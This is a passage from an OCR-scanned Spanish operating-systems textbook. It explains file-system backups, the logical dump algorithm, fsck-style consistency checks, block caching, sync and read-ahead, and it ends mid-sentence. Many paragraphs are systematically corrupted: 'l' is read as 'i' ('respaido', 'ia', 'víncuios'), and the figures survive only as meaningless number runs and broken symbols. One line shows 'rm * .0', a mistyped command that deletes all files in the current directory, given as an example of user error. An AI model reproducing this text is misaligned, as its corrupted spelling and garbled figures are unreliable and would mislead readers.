los archivos especiales (dispositivos de E/S) se mantienen en un directorio /dev. No sólo es innece¬ 
sario respaldar este directorio, sino que es bastante peligroso debido a que el programa de respaldo 
se quedaría paralizado para siempre si tratara de leer cada uno de estos archivos hasta que se com¬ 
pletaran. En resumen, por lo general es conveniente respaldar sólo directorios específicos y todo lo 
que contengan, en vez de respaldar todo el sistema de archivos. 
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En segundo lugar, es un desperdicio respaidar archivos que no han cambiado desde ei úitimo 
respaido, io cuai nos iieva a ia idea de ios vaciados increméntales. La forma más simpie de vacia¬ 
do incrementai es reaiizar un vaciado compieto (respaido) en forma periódica, por decir cada sema¬ 
na o cada mes, y reaiizar un vaciado diario de sóio aqueiios archivos que se hayan modificado desde 
ei úitimo vaciado compieto. M ejor aún es vaciar sóio ios archivos que han cambiado desde ia úiti- 
ma vez que se vaciaron. Aunque este esquema minimiza ei tiempo de vaciado, compiica más ia re¬ 
cuperación debido a que se tiene que restaurar ei vaciado compieto más reciente, seguido de todos 
ios vaciados incrementaies en orden inverso. Para faciiitar ia recuperación se utiiizan con frecuen¬ 
cia esquemas de vaciado incrementai más sofisticados. 

En tercer iugar, como por i o generai se vacían inmensas cantidades de datos, puede ser conve¬ 
niente comprimir ios datos antes de escribidos en cinta. Sin embargo, con muchos aigoritmos de 
compresión un soio punto maio en ia cinta de respaido puede frustrar ei aigoritmo de descompre¬ 
sión y hacer que todo un archivo o inciuso toda una cinta, sea iiegibie. Por ende, ia decisión de com¬ 
primir ei fiujo de respaido se debe considerar con cuidado. 

En cuarto iugar, es difícii iievar a cabo un respaido en un sistema de archivos activo. Si se es¬ 
tán agregando, eiiminando y modificando archivos y directorios durante ei proceso de vaciado, ei 
vaciado resuitante puede ser inconsistente. Sin embargo, como para reaiizar un vaciado se pueden 
requerir horas, tai vez sea necesario desconectar ei sistema de ia red durante gran parte de ia noche pa¬ 
ra reaiizar ei respaido, aigo que no siempre es aceptabie. Por esta razón se han ideado aigoritmos 
para tomar instantáneas rápidas dei sistema de archivos ai copiar ias estructuras de datos críticas y 
después requerir que ios futuros cambios a ios archivos y directorios copien ios bioques en vez de 
actuaiizarios ai instante (Hutchinson y coiaboradores, 1999). De esta forma, ei sistema de archivos 
en efecto se congeia ai momento de ia instantánea, por io que se puede respaidar a conveniencia 
después de eiio. 

En quinto y úitimo iugar, ai reaiizar respaidos se introducen en una organización muchos pro- 
biemas que no son técnicos. Ei mejor sistema de seguridad en iínea dei mundo sería inútii si ei ad¬ 
ministrador dei sistema mantiene todas ias cintas de respaido en su oficina y ia deja abierta y 
desprotegida cada vez que se dirige por ei pasiiio a recoger ios resuitados de ia impresora. Todo io 
que un espía tiene que hacer es entrar por un segundo, coiocar una pequeña cinta en su boisiiio y 
saiir con tranquiiidad y confianza. Adiós a ia seguridad. Además, reaiizar un respaido diario es de 
poca utiiidad si ei incendio que quemó a ias computadoras también quema todas ias cintas de res¬ 
paido. Por esta razón, ias cintas de respaido se deben mantener fuera dei sitio, pero eso introduce 
más riesgos de seguridad (debido a que ahora se deben asegurar dos sitios). Para ver un anáiisis de¬ 
tai iado de éstas y otras cuestiones de administración prácticas, consuite (Nemeth y coiaboradores, 
2000). A continuación sóio anai izaremos ias cuestiones técnicas impiicadas en reaiizar respaidos dei 
sistema de archivos. 

Se pueden utiiizar dos estrategias para vaciar un disco en ia cinta: un vaciado físico o un va¬ 
ciado iógico. Un vaciado físico empieza en ei bioqueOdei disco, escribe todos ios bioques dei dis¬ 
co en ia cinta desaiida en orden y se detiene cuando acaba de copiar ei úitimo. Dicho programa es 
tan simpie que probabiemente pueda hacerse 100% iibre de errores, aigo que probabiemente no se 
pueda decir acerca de cuaiquier otro programa útii. 

Sin embargo, vaieia pena hacer varios comentarios acerca dei vaciado físico. Por una parte, no 
hay ningún vaior en respaidar bioques de disco sin utiiizar. Si ei programa de vaciado puede obte- 
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ner acceso a la estructura de datos de bloques libres, puede evitar vaciar los bloques no utilizados. 
Sin embargo, para omitir los bloques no utilizados hay que escribir el número de cada bloque en 
frente de éste (o su equivalente), ya que en este caso no se aplica que el bloque k en la cinta sea el 
bloque k en el disco. 

U na segunda preocupación es la de vaciar bloques defectuosos. Es casi imposible fabricar dis¬ 
cos grandes sin ningún defecto. Siempre hay algunos bloques defectuosos presentes. Algunas veces 
cuando se realiza un formato de bajo nivel se detectan los bloques defectuosos, se marcan y se 
reemplazan por bloques reservados al final de cada pista para tales emergencias. En muchos casos, 
el controlador del disco se encarga del reemplazo de bloques defectuosos de manera transparente, 
sin que el sistema operativo sepa siquiera acerca de ello. 

Sin embargo, algunas veces los bloques se vuelven defectuosos después del formato, en cuyo 
caso el sistema operativo los detectará en un momento dado. Por lo general, resuelve el problema 
creando un "archivo" consistente en todos los bloques malos, sólo para asegurarse que nunca apa¬ 
rezcan en la reserva de bloques libres y que nunca se asignen. Este archivo, sobra decirlo, es com¬ 
pletamente ilegible. 

Si todos los bloques defectuosos son reasociados por el controlador de disco y se ocultan del sis¬ 
tema operativo como acabamos de describir, el vaciado físico funciona bien. Por otro lado, si están 
visibles para el sistema operativo y se mantienen en uno o más archivos de bloques defectuosos o 
mapas de bits, es en lo absoluto esencial que el programa de vaciado físico obtenga acceso a esta in¬ 
formación y evite vaciarlos, para evitar interminables errores de lectura del disco al tratar de respal¬ 
dar el archivo de bloques defectuosos. 

Las principales ventajas del vaciado físico son la simplicidad y una gran velocidad (básicamen¬ 
te, puede operar a la velocidad del disco). Las principales desventajas son la incapacidad de omitir 
directorios seleccionados, realizar vaciados increméntales y restaurar archivos individuales a peti¬ 
ción del usuario. Por estas razones, la mayoría de las instalaciones realizan vaciados lógicos. 

U n vaciado lógico empieza en uno o más directorios especificados y vacía en forma recursiva to¬ 
dos los archivos y directorios que se encuentran ahí que hayan sido modificados desde cierta fecha ba¬ 
se dada (por ejemplo, el último respaldo para un vaciado incremental o la instalación del sistema para 
un vaciado completo). Así, en un vaciado lógico la cinta de vaciado obtiene una serie de directorios y 
archivos cuidadosamente identificados, lo cual facilita la restauración de un archivo o directorio espe¬ 
cífico a petición del usuario. 

Como el vaciado lógico es la forma más común, vamos a examinar un algoritmo común en for¬ 
ma detallada, utilizando el ejemplo de la figura 4-25 para guiarnos. La mayoría de los sistemas 
UNIX utilizan este algoritmo. En la figura podemos ver un árbol de archivos con directorios (cua¬ 
dros) y archivos (círculos). Los elementos sombreados se han modificado desde la fecha basey por 
ende necesitan vaciarse. Los que no están sombreados no necesitan vaciarse. 

Este algoritmo también vacía todos los directorios (incluso los que no se han modificado) que 
se encuentran en la ruta hacia un archivo o directorio modificado por dos razones. En primer lugar, 
para que sea posible restaurar los archivos y directorios vaciados a un sistema de archivos fresco en 
una computadora distinta. De esta forma, los programas de vaciado y restauración se pueden utili¬ 
zar para transportar sistemas de archivos completos entre computadoras. 

La segunda razón de vaciar directorios no modificados que estén arriba de archivos modifica¬ 
dos es para que sea posible restaurar un solo archivo en forma incremental (tal vez para manejar 
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Figura 4-25. U n sistema de archivos que se va a vaciar. Los cuadros son directorios y 
ios circuios son archivos. Los eiementos sombreados han sido modificados desde ei úiti- 
mo vaciado. Cada directorio y archivo está etiquetado con base en su número de nodo-i. 


la recuperación por causa de estupidez). Suponga que se realiza un vaciado completo del sistema 
de archivos el domingo por la tardey un vaciado incremental el lunes por la tarde. El martes se re¬ 
mueve el directorio /usr/jhs/proy/nr3, junto con todos los directorios y archivos debajo de él. El 
miércoles en la mañana, el usuario desea restaurar el archivo /usr/jhs/proy/nr3/planes/resumen. 
Sin embargo, no es posible restaurar sólo el archivo resumen debido a que no hay lugar en dónde 
ponerlo. Los directorios nr3 y planes se deben restaurar primero. Para obtener los datos correctos 
sobre sus propietarios, modos, horas y demás, estos directorios deben estar presentes en la cinta 
de vaciado, aun cuando no hayan sido modificados desde la última vez que ocurrió un vaciado 
completo. 

El algoritmo de vaciado mantiene un mapa de bits indexado por número de nodo-i con varios 
bits por nodo-i. Los bits se activarán y borrarán en el mapa, a medida que el algoritmo realice su 
trabajo. El algoritmo opera en cuatro fases. La fase 1 empieza en el directorio inicial (el directorio 
raíz en este ejemplo) y examina todas las entradas que contiene. Para cada archivo modificado, se 
marca su nodo-i en el mapa de bits. Cada directorio también se marca (se haya modificado o no) y 
después se inspecciona de manera recursiva. 

Al final de la fase 1, se han marcado todos los archivos y directorios modificados en el mapa 
de bits, como se muestra (mediante el sombreado) en la figura 4-26(a). En concepto, la fase 2 reco¬ 
rre en forma recursiva el árbol de nuevo, desmarcando los directorios que no tengan archivos o di¬ 
rectorios modificados en ellos, o bajo ellos. Esta fase deja el mapa de bits que se muestra en la 
figura 4-26(b). Observe que los directorios 10,11,14, 27, 29 y 30 ahora están desmarcados, ya que 
no contienen nada bajo ellos que se haya modificado. Estos directorios no se vaciarán. Por el con¬ 
trario, los directorios 5 y 6 se vaciarán incluso aunque en sí no se hayan modificado, ya que se ne- 
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cesitarán para restaurar los cambios de hoy en una máquina nueva. Por cuestión de eficiencia, ias 
fases 1 y 2 se pueden combinar en un soio recorrido dei árboi. 


1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22 

23 

24 

25 

26 

27 

28 

29 

30 

31 

32 


1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22 

23 

24 

25 

26 

27 

28 

29 

30 

31 

32 


1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22 

23 

24 

25 

26 

27 

28 

29 

30 

31 

32 


1 

2 

3 

4 

5 

6 

7 

8 

9 

10 

11 

12 

13 

14 

15 

16 

17 

18 

19 

20 

21 

22 

23 

24 

25 

26 

27 

28 

29 

30 

31 

32 


Figura 4-26. M apas de bits utilizados por el algoritmo de vaciado lógico. 


En este punto se sabe qué directorios y archivos se deben vaciar. Éstos son ios que están mar¬ 
cados en ia figura 4-26(b). La fase 3 consiste en expiorar ios nodos-i en orden numérico y vaciar 
todos ios directorios marcados para vaciado. Éstos se muestran en ia figura 4-26(c). Cada directo¬ 
rio tiene como prefijo sus atributos (propietario, horas, etc.) de manera que se pueda restaurar. Por 
úitimo, en ia fase 4 también se vacían ios archivos marcados en ia figura 4.26(d), que de nuevo tie¬ 
nen como prefijo sus atributos. Esto compieta ei vaciado. 

Restaurar un sistema de archivos a partir de ias cintas de vaciado es un proceso directo. Para 
empezar, se crea un sistema de archivos vacío en ei disco. Después se restaura ei vaciado compie- 
to más reciente. Como ios directorios aparecen primero en ia cinta, se restauran todos primero, con 
io cuai se obtiene un esqueieto dei sistema de archivos. Después se restauran ios archivos en sí. Es¬ 
te proceso se repite con ei primer vaciado incrementai reaiizado después dei vaciado compieto, des¬ 
pués ei siguiente y así en io sucesivo. 

A unque ei vaciado iógico es directo, hay unas cuantas cuestiones engañosas. Por ejempio, co¬ 
mo ia iista de bioques iibres no es un archivo, no se vacía y por ende se debe reconstruir desde ce¬ 
ro, una vez que se han restaurado todos ios vaciados. Esto es siempre posibie, ya que ei conjunto 
de bioques iibres es sóio ei compiemento dei conjunto de bioques contenidos en todos ios archivos 
combinados. 

Los víncuios son otra de ias cuestiones. Si un archivo se vincuia a uno o más directorios, es im¬ 
portante que ei archivo se restaure sóio una vez y que todos ios directorios que deben apuntar a éi 
io hagan. 

Otra de ias cuestiones es ei hecho de que ios archivos de UNIX pueden contener huecos. Es 
legal abrir un archivo, escribir unos cuantos bytes, después realizar una búsqueda hacia un des¬ 
plazamiento de archivo distante y escribir unos cuantos bytes más. Los bloques en el medio no 
forman parte del archivo, por lo que no deben vaciarse ni restaurarse. A menudo los archivos bá¬ 
sicos tienen un hueco de cientos de megabytes entre el segmento de datos y la pila. Si no se ma¬ 
nejan en forma apropiada, cada archivo básico restaurado llenará esta área con ceros y por ende. 
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será del mismo tamaño que el espacio de direcciones virtuales (por ejemplo, de2^2 bytes, o peor 
aún, de 2®^ bytes). 

Por último, los archivos especiales (llamados canales) y sus equivalentes nunca deben vaciar¬ 
se, sin importar en qué directorio se encuentren (no necesitan confinarse a /dev). Para obtener más 
información acerca de los respaldos del sistema de archivos, consulte (Chervenak y colaboradores, 
1998; y Zwicky, 1991). 

Las densidades de las cintas no están mejorando con tanta rapidez como las densidades de los 
discos. Esto conlleva gradualmente a una situación en la que tal vez el respaldo de un disco muy 
grande requiera de varias cintas. A unque hay robots disponibles para cambiar las cintas de manera 
automática, si esta tendencia continúa, en un momento dado las cintas serán demasiado pequeñas 
como para utilizarlas como medio de respaldo. En ese caso, la única forma de respaldar un disco 
será en otro disco. Aunque utilizar el método de reflejar cada disco con un repuesto es una posibi¬ 
lidad, en el capítulo 5 analizaremos esquemas más sofisticados, conocidos como RAIDs. 

4.4.3 C onsistencia del sistema de archivos 

otra área donde la confiabilidad es una cuestión importante es la de consistencia del sistema de ar¬ 
chivos. M uchos sistemas de archivos leen bloques, los modifican y los escriben posteriormente. Si 
el sistema falla antes de escribir todos los bloques modificados, el sistema de archivos puede que¬ 
dar en un estado inconsistente. Este problema es muy crítico si algunos de los bloques que no se 
han escrito son bloques de nodos-i, bloques de directorios o bloques que contienen la lista de blo¬ 
ques libres. 

Para lidiar con el problema de los sistemas de archivos inconsistentes, la mayoría de las compu¬ 
tadoras tienen un programa utilitario que verifica la consistencia del sistema de archivos. Por ejem¬ 
plo, UNIX tiene a fsck y Windows tiene a scandisk. Esta herramienta se puede ejecutar cada vez 
que se arranca el sistema, en especial después de una falla. La descripción de más adelante nos in¬ 
dica cómo funciona fsck. Scandisk es un poco distinto, ya que opera en un sistema de archivos di¬ 
ferente, pero el principio general de utilizar la redundancia inherente del sistema de archivos para 
repararlo todavía es válido. Todos los verificadores de sistema de archivos comprueban cada siste¬ 
ma de archivos (partición de disco) de manera independiente de los demás. 

Se pueden realizar dos tipos de verificaciones de consistencia: archivos y bloques. Para com¬ 
probar la consistencia de los bloques, el programa crea dos tablas, cada una de las cuales contiene 
un contador para cada bloque, que al principio se establece en 0. Los contadores en la primera ta¬ 
bla llevan el registro de cuántas veces está presente cada bloqueen un archivo: los contadores en la 
segunda tabla registran con qué frecuencia está presente cada bloqueen la lista de bloques libres (o 
en el mapa de bits de bloques libres). 

Después el programa lee todos los nodos-i utilizando un dispositivo puro, el cual ignora la es¬ 
tructura de los archivos y sólo devuelve todos los bloques de disco que empiezan en 0. Si partimos 
de un nodo-i, es posible construir una lista de todos los números de bloque utilizados en el archivo 
correspondiente. A medida que se lee cada número de bloque, se incrementa su contador en la pri¬ 
mera tabla. Después el programa examina la lista o mapa de bits de bloques libres para encontrar 
todos los bloques que no estén en uso. Cada ocurrencia de un bloque en la lista de bloques libres 
hace que se incremente su contador en la segunda tabla. 
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Si el sistema de archivos es consistente, cada bloque tendrá un 1 en la primera tabla o en la se¬ 
gunda, como se ilustra en la figura 4-27(a). Sin embargo, como resultado de una falla, las tablas po¬ 
drían verse como en la figura 4-27(b), donde el bloque 2 no ocurre en ninguna de las dos tablas. Se 
reportará como un bloque fallante. Aunque los bloques faltantes no hacen un daño real, desperdi¬ 
cian espacio y por ende reducen la capacidad del disco. La solución a los bloques faltantes es direc¬ 
ta: el verificador del sistema de archivos sólo los agrega a la lista de bloques libres. 
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O 1 2 3 4 5 6 7 8 9 101112131415 0123456789 101112131415 

l|l|o|l|o|l|l|l|l|o|o|l|l|l|o|o| Bloques en uso 


0010200001100011 Bloques libres 


(O (d) 

Figura 4-27. Estados del sistema de archivos, (a) Consistente, (b) Bloque fáltente, 
(c) Bloque duplicado en la lista de bloques libres, (d) Bloque de datos duplicado. 
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Otra situación que podría ocurrir es la de la figura 4-27(c). Aquí podemos ver un bloque, el nú¬ 
mero 4, que ocurre dos veces en la lista de bloques libres (puede haber duplicados sólo si la lista de 
bloques libres es en realidad una lista; con un mapa de bits es imposible). La solución aquí también 
es simple: reconstruir la lista de bloques libres. 

Lo peor que puede ocurrir es que el mismo bloque de datos esté presente en dos o más archi¬ 
vos, como se muestra en la figura 4.27(d) con el bloque 5. Si se remueve alguno de esos archivos, 
el bloques se colocará en la lista de bloques libres, lo cual producirá una situación en la que el mis¬ 
mo bloque, al mismo tiempo, esté en uso y sea libre. Si se remueven ambos archivos, el bloque se 
colocará dos veces en la lista de bloques libres. 

La acción apropiada que debe tomar el verificador del sistema de archivos es asignar un blo¬ 
que libre, copiar el contenido del bloque 5 en él e insertar la copia en uno de los archivos. De esta 
forma, el contenido de información en los archivos no se modifica (aunque es muy probable que 
uno ellos termine con basura), pero por lo menos la estructura del sistema de archivos se hace con¬ 
sistente. El error se debe reportar para permitir que el usuario inspeccione los daños. 

Además de verificar que cada bloque se haya contabilizado apropiadamente, el verificador del 
sistema de archivos también verifica el sistema de directorios. Utiliza también una tabla de conta¬ 
dores, pero éstos son por archivo, no por bloque. Empieza en el directorio raíz y desciende recursi¬ 
vamente por el árbol, inspeccionando cada directorio en el sistema de archivos. Para cada nodo-i en 
cada directorio, incrementa un contador para la cuenta de uso de ese archivo. Recuerde que debido 
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a los vínculos duros, un archivo puede aparecer en dos o más directorios. Losvíncuios simbóiicos 
no cuentan y no hacen que se incremente ei contador para ei archivo objetivo. 

Cuando ei verificador termina, tiene una iista indexada por número de nodo-i, que indica cuán¬ 
tos directorios contienen cada archivo. Después compara estos números con ias cuentas de víncu- 
ios aimacenadas en ios mismos nodos-i. Estas cuentas empiezan en 1 cuando se crea un archivo y 
se incrementan cada vez que se crea un víncuio (duro) ai archivo. En un sistema de archivos con¬ 
sistentes, ambas cuentas concordarán. Sin embargo, pueden ocurrir dos tipos de errores: que ia 
cuenta de víncuios en ei nodo-i sea demasiado aita o demasiado baja. 

Si ia cuenta de víncuios es mayor que ei número de entradas en ei directorio, entonces aun 
si se remueven todos ios archivos de ios directorios, ia cuenta seguirá siendo distinta de cero y ei 
nodo-i no se removerá. Este error no es grave, pero desperdicia espacio en ei disco con archivos 
que no están en ningún directorio. Para corregido, se debe estabiecer ia cuenta de víncuios en ei 
nodo-i ai vaior correcto. 

Ei otro error es potenciaimente catastrófico. Si dos entradas en ei directorio están vincuiados a 
un archivo, pero ei nodo-i dice que sóio hay una, cuando se eiimine una de ias dos entradas dei di¬ 
rectorio, ia cuenta de nodos-i será cero. Cuando una cuenta de nodos-i queda en cero, ei sistema de 
archivos ia marca como no utiiizada y iibera todos sus bioques. Esta acción hará que uno de ios di¬ 
rectorios apunte ahora a un nodo-i sin utiiizar, cuyos bioques pueden asignarse pronto a otros archi¬ 
vos. De nuevo, ia soiución es tan sóio obiigar a que ia cuenta de víncuios en ei nodo-i sea iguai ai 
número actuai de entradas dei directorio. 

Estas dos operaciones, verificar bioques y verificar directorios, se integran a menudo por cues¬ 
tiones de eficiencia (es decir, sóio se requiere una pasada sobre ios nodos-i). También son posibies 
otras comprobaciones. Por ejempio, ios directorios tienen un formato definido, con números de no- 
dos-i y nombres ASCII. Si un número de nodo-i es más grande que ei número de nodos-i en ei dis¬ 
co, ei directorio se ha dañado. 

Además, cada nodo-i tiene un modo, aigunos de ios cuaies son iegaies pero extraños, como 
0007, que no permite ningún tipo de acceso ai propietario y su grupo, pero permite a ios usuarios 
externos ieer, escribir y ejecutar ei archivo. Podría ser útii por io menos reportar ios archivos que 
dan a ios usuarios externos más derechos que ai propietario. Los directorios con más de, por decir, 
1000 entradas, son también sospechosos. Los archivos iocaiizados en directorios de usuario, pero 
que son propiedad dei superusuario y tienen ei bit SETUID activado, son probiemas potenciaies de 
seguridad debido a que dichos archivos adquieren ios poderes dei superusuario cuando son ejecu¬ 
tados por cuaiquier usuario. Con un poco de esfuerzo, podemos reunir una iista bastante extensa de 
situaciones técnicamente iegaies, pero aún así pecuiiares, que podría vaier ia pena reportar. 

En ios párrafos anteriores hemos anaiizado ei probiema de proteger ai usuario contra ias faiias. 
Aigunos sistemas de archivos también se preocupan por proteger ai usuario contra sí mismo. Si ei 
usuario trata de escribir 

rm *0 

para quitar todos ios archivos que terminen con .o (archivos objeto generados por ei compiiador), 
pero escribe por accidente 


rm * .0 
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(observe el espacio después del asterisco), rm eliminará todos los archivos en el directorio actual y 
después se quejará de que no puede encontrar . 0 . En M S-DOS y algunos otros sistemas, cuando se 
remueve un archivo todo lo que ocurre es que se establece un bit en el directorio o nodo-i que mar¬ 
ca el archivo como removido. No se devuelven bloques de disco a la lista de bloques libres sino has¬ 
ta que realmente se necesiten. Así, si el usuario descubre el error de inmediato, es posible ejecutar 
un programa de utilería especial que "des-remueve" (es decir, restaura) los archivos removidos. En 
Windows, los archivos que se remueven se colocan en la papelera de reciclaje (un directorio espe¬ 
cial), desde donde se pueden recuperar más tarde, si se da la necesidad. Desde luego que no se re¬ 
clama el espacio de almacenamiento sino hasta que realmente se remuevan de este directorio. 


4.4.4 Rendimiento del sistema de archivos 

El acceso al disco es mucho más lento que el acceso a la memoria. Para leer una palabra de memoria 
de 32 bits se podrían requerir 10 nseg. La lectura de un disco duro se podría realizar a 100 M B/seg, 
que es cuatro veces más lenta que la de la palabra de 32 bits, pero a esto se le debe agregar de 5 a 10 
mseg para realizar una búsqueda hasta la pista y después esperar a que se coloque el sector deseado 
bajo la cabeza de lectura. Si se necesita sólo una palabra, el acceso a memoria está en el orden de un 
millón de veces más rápido que el acceso al disco. Como resultado de esta diferencia en el tiempo de 
acceso, muchos sistemas de archivos se han diseñado con varias optimizaciones para mejorar el ren¬ 
dimiento. En esta sección hablaremos sobre tres de ellas. 

Uso de caché 

La técnica más común utilizada para reducir los accesos al disco es la caché de bloques o caché 
debúfer (caché se deriva del francés cacher, que significa ocultar). En este contexto, una caché es 
una colección de bloques que pertenecen lógicamente al disco, pero se mantienen en memoria por 
cuestiones de rendimiento. 

Se pueden utilizar varios algoritmos para administrar la caché, pero un algoritmo común es ve¬ 
rificar todas las peticiones de lectura para ver si el bloque necesario está en la caché. Si está, la pe¬ 
tición de lectura se puede satisfacer sin necesidad de acceder al disco. Si el bloque no está en la 
caché, primero se lee en la caché y después se copia a donde sea necesario. Las peticiones poste¬ 
riores de ese mismo bloque se pueden satisfacer desde la caché. 

La operación déla caché se i lustra en la figura 4-28. Como hay muchos bloques (a menudo mi¬ 
les) en la caché, se necesita cierta forma de determinar con rapidez si cierto bloque está presente. 
La forma usual es codificaren hash la dirección de dispositivo y de disco, buscando el resultado en 
una tabla de hash. Todos los bloques con el mismo valor de hash se encadenan en una lista enlaza¬ 
da, de manera que se pueda seguir la cadena de colisiones. 

Cuando se tiene que cargar un bloque en una caché llena, hay que eliminar cierto bloque (y 
volver a escribirlo en el disco, si se ha modificado desde la última vez que se trajo). Esta situación 
es muy parecida a la paginación y se pueden aplicar todos los algoritmos de reemplazo de página 
usuales descritos en el capítulo 3, como PIFO, segunda oportunidad y LRU. Una diferencia pla¬ 
centera entre la paginación y el uso de la caché es que las referencias a la caché son relativamente 
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infrecuentes, por lo que es factible mantener todos los bloques en orden LRU exacto con listas 
enlazadas. 

En la figura 4-28 podemos ver que además de las cadenas de colisión que empiezan en la tabla 
de hash, también hay una lista bidireccional que pasa por todos los bloques en el orden de uso, donde 
el bloque de uso menos reciente está al frente de esta lista y el bloque de uso más reciente está al 
final. Cuando se hace referencia a un bloque, se puede quitar de su posición en la lista bidireccio¬ 
nal y colocarse al final. De esta forma, se puede mantener el orden LRU exacto. 

Por desgracia hay una desventaja. Ahora que tenemos una situación en la que es posible el 
LRU exacto, resulta ser que esto no es deseable. El problema tiene que ver con las fallas y la con¬ 
sistencia del sistema de archivos que vimos en la sección anterior. Si un bloque crítico, como un 
bloque de nodos-i, se lee en la caché y se modifica pero no se vuelve a escribir en el disco, una fa¬ 
lla dejará al sistema de archivos en un estado inconsistente. Si el bloque de nodos-i se coloca al fi¬ 
nal de la cadena LRU, puede pasar un buen tiempo antes de que llegue al frente y se vuelva a 
escribir en el disco. 

Además, es raro que se haga referencia a ciertos bloques, como los bloques de nodos-i, dos ve¬ 
ces dentro de un intervalo corto de tiempo. Estas consideraciones conllevan a un esquema LRU mo¬ 
dificado, tomando en cuenta dos factores: 

1. ¿Es probable que el bloque se necesite pronto otra vez? 

2. ¿Es el bloque esencial para la consistencia del sistema de archivos? 

Para ambas preguntas, los bloques se pueden dividir en categorías como bloques de nodos-i, 
bloques indirectos, bloques de directorios, bloques de datos llenos y bloques de datos parcialmen¬ 
te llenos. Los bloques que tal vez no se necesiten de nuevo pronto pasan al frente, en vez de pasar 
al final de la lista LRU, por lo que sus búferes se reutilizarán con rapidez. Los bloques que podrían 
necesitarse pronto, como un bloque parcialmente lleno que se está escribiendo, pasan al final de la 
lista, por lo que permanecerán ahí por mucho tiempo. 

La segunda pregunta es independiente de la primera. Si el bloque es esencial para la consisten¬ 
cia del sistema de archivos (básicamente, todo excepto los bloques de datos) y ha sido modificado, 
debe escribirse de inmediato en el disco, sin importar en cuál extremo de la lista LRU esté coloca- 
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do. Al escribirlos bloques críticos con rapidez, reducimos en forma considerable la probabilidad de 
que una falla estropee todo el sistema de archivos. Aunque un usuario puede estar inconforme si 
uno de sus archivos se arruina en una falla, es probable que esté más inconforme si se pierde todo 
el sistema de archivos. 

Incluso con esta medida para mantener intacta la integridad del sistema de archivos, es inde¬ 
seable mantener los bloques de datos en la caché por mucho tiempo antes de escribirlos. Conside¬ 
re la situación apremiante de alguien que utiliza una computadora personal para escribir un libro. 
Aun si nuestro escritor indica en forma periódica al editor que escriba en el disco el archivo que se 
está editando, hay una buena probabilidad de que todo esté todavía en la caché y no haya nada en 
el disco. Si el sistema falla, la estructura del sistema de archivos no se volverá corrupta, pero se per¬ 
derá todo un día de trabajo. 

Esta situación no necesita ocurrir con mucha frecuencia para que un usuario esté bastante mo¬ 
lesto. Los sistemas utilizan dos esquemas para lidiar con ella. La forma utilizada por UNIX es ha¬ 
cer una llamada al sistema, sync, que obligue a que se escriban todos los bloques modificados en 
el disco de inmediato. Cuando el sistema se arranca, un programa conocido comúnmente como 
update se inicia en segundo plano para permanecer en un ciclo sin fin emitiendo llamadas a sync, 
permaneciendo inactivo durante 30 segundos entre una llamada y otra. Como resultado, no se pier¬ 
den más que 30 segundos de trabajo debido a una falla. 

Aunque Windows tiene ahora una llamada al sistema equivalente a sync, conocida como 
FiushFiieBuffers, en el pasado no tenía nada. En vez de ello, tenía una estrategia diferente que en 
ciertos aspectos era mejor que el esquema de U NIX (y en otros aspectos era peor). Lo que hacía era 
escribir cada bloque modificado en el disco tan pronto como se había escrito en la caché. Las ca- 
chés en las que todos los bloques modificados se escriben de inmediato en el disco se conocen co¬ 
mo cachés de escritura inmediata. Requieren más operaciones de E/S de disco que las cachés que 
no son de escritura inmediata. 

L a diferencia entre estos dos esquemas se puede ver cuando un programa escri be un bloque I le¬ 
ño de 1 KB, un carácter a la vez. UNIX recolectará todos los caracteres en la caché y escribirá el 
bloque en el disco una vez cada 30 segundos o cuando el bloque se elimine de la caché. Con una 
caché de escritura inmediata, hay un acceso al disco por cada carácter escrito. Desde luego que la 
mayoría de los programas utilizan un búfer interno, por lo que generalmente no escriben un carác¬ 
ter, sino una línea o una unidad más grande en cada llamada al sistema write. 

U na consecuencia de esta diferencia en la estrategia de uso de cachés es que con sólo sacar un 
disco (flexible) de un sistema UNIX sin realizar una llamada a sync, casi siempre se perderán da¬ 
tos y con frecuencia se obtendrá un sistema de archivos corrupto también. Con la caché de escritu¬ 
ra inmediata no surge ningún problema. Estas distintas estrategias se eligieron debido a que UNIX 
se desarrolló en un entorno en el que todos los discos eran discos duros y no removibles, mientras 
que el primer sistema de archivos de Windows se heredó de M S-DOS, que empezó en el mundo del 
disco flexible. A medida que los discos duros se convirtieron en la norma, el método de U NIX, con 
la mejor eficiencia (pero la peor confiabilidad) se convirtió en la norma y también se utiliza ahora 
en Windows para los discos duros. Sin embargo, NTFS toma otras medidas (por bitácora) para me¬ 
jorar la confiabilidad, como vimos antes. 

Algunos sistemas operativos integran la caché de búfer con la caché de páginas. Esto es en 
especial atractivo cuando se soportan archivos asociados a memoria. Si un archivo se asocia a la 
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memoria, entonces algunas de sus páginas pueden estar en memoria debido a que se paginaron ba¬ 
jo demanda. Dichas páginas no son muy distintas a los bloques de archivos en la caché de búfer. En 
este caso se pueden tratar de la misma forma, con una sola caché tanto para bloques de archivos co¬ 
mo para páginas. 


Lectura adelantada de bloque 

Una segunda técnica para mejorar el rendimiento percibido por el sistema de archivos es tratar de 
colocar bloques en la caché antes de que se necesiten, para incrementar la proporción de aciertos. 
En especial, muchos archivos se leen en forma secuencial. Cuando se pide al sistema de archivos 
que produzca el bloque k en un archivo, hace eso, pero cuando termina realiza una verificación di¬ 
simulada en la caché para ver si el bloque k + 1 ya está ahí. Si no está, planifica una lectura para 
el bloque k -i-1 con la esperanza de que cuando se necesite, ya haya llegado a la caché. Cuando me¬ 
nos, estará en camino. 

Desde luego que esta estrategia de lectura adelantada sólo funciona para los archivos que se 
leen en forma secuencial. Si se accede a un archivo en forma aleatoria, la lectura adelantada no ayu¬ 
da. De hecho afecta, ya que ocupa ancho de banda del disco al leer bloques inútiles y eliminar blo¬ 
ques potencialmente útiles de la caché (y tal vez ocupando más ancho de banda del disco al escribirlos 
de vuelta al disco si están sucios). Para ver si vale la pena realizar la lectura adelantada, el siste¬ 
ma de archivos puede llevar un registro de los patrones de acceso a cada archivo abierto. Por ejem¬ 
plo, un bit asociado con cada archivo puede llevar la cuenta de si el archivo está en "modo de acceso 
secuencial" o en "modo de acceso aleatorio". Al principio, el archivo recibe el beneficio de la du¬ 
da y se coloca en modo de acceso secuencial. Sin embargo, cada vez que se realiza una búsqueda, 
el bit se desactiva. Si empiezan de nuevo las lecturas secuenciales, el bit se activa otra vez. De es¬ 
